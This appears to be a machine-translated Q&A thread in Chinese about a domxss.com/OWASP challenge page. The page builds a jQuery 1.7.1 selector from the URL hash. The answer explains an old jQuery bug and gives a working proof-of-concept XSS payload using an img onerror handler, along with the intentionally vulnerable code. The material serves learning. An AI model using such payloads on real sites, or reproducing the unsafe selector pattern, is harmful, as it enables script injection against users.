在这个domxss.com挑战中,HTML注入是如何可能的

2022-04-08 00:00:00 jquery html xss owasp html-injections

OWASP的HTML注入测试页(link)显示了被认为易受HTML注入攻击的特定代码。

<script src="../js/jquery-1.7.1.js"></script>
<script>
function setMessage(){
    var t=location.hash.slice(1);
    $("div[id="+t+"]").text("The DOM is now loaded and can be manipulated.");
}
$(document).ready(setMessage  );
$(window).bind("hashchange",setMessage)
</script>
<body>
    <script src="../js/embed.js"></script>
    <span><a href="#message" > Show Here</a><div id="message">Showing Message1</div></span>
    <span><a href="#message1" > Show Here</a><div id="message1">Showing Message2</div>
    <span><a href="#message2" > Show Here</a><div id="message2">Showing Message3</div>
</body>

此代码是(domxss.com)上的挑战之一,我不确定它是否易受攻击。

据我所知,URL的散列可以用作输入,URL中的任何更改都将触发setMessage函数。此URL哈希将成为我的有效负载。然而,此有效负载仅用作jQuery中的选择器,而这正是我遇到困难的地方。

我对XSS比较陌生,因此任何有效负载都将不胜感激。显然,欢迎作出解释。

此外,任何通过jQuery更好地了解HTML注入攻击的资源都将是有用的。

jQuery

是的,非常旧的推荐答案版本对来自动态选择器字符串的xss是易受攻击的。参见jQuery的错误跟踪器上的Bug # 11290-如果表述正确,选择器字符串可能会意外地被解释为HTML。如果用户可以提供选择器字符串,您可能会遇到麻烦。

最小示例:

数据-lang="js"数据-隐藏="假"数据-控制台="真"数据-巴贝尔="假">
$(`div[class='<img src="" onerror=alert("evil")>]`).text("The DOM is now loaded and can be manipulated.");
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>

所以,原来的

$("div[id="+t+"]")

可以注入导致运行任意代码的t

数据-lang="js"数据-隐藏="真"数据-控制台="真"数据-巴贝尔="假">
const t = `'<img src="" onerror=alert("evil")>]`;
$("div[id="+t+"]").text("The DOM is now loaded and can be manipulated.");
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>

该错误已在9年前修复,因此,除非您故意使用旧版本的jQuery并且从不更新依赖项,否则它可能不会影响您。

该错误最终由an insufficiently strict regex.引起。

相关文章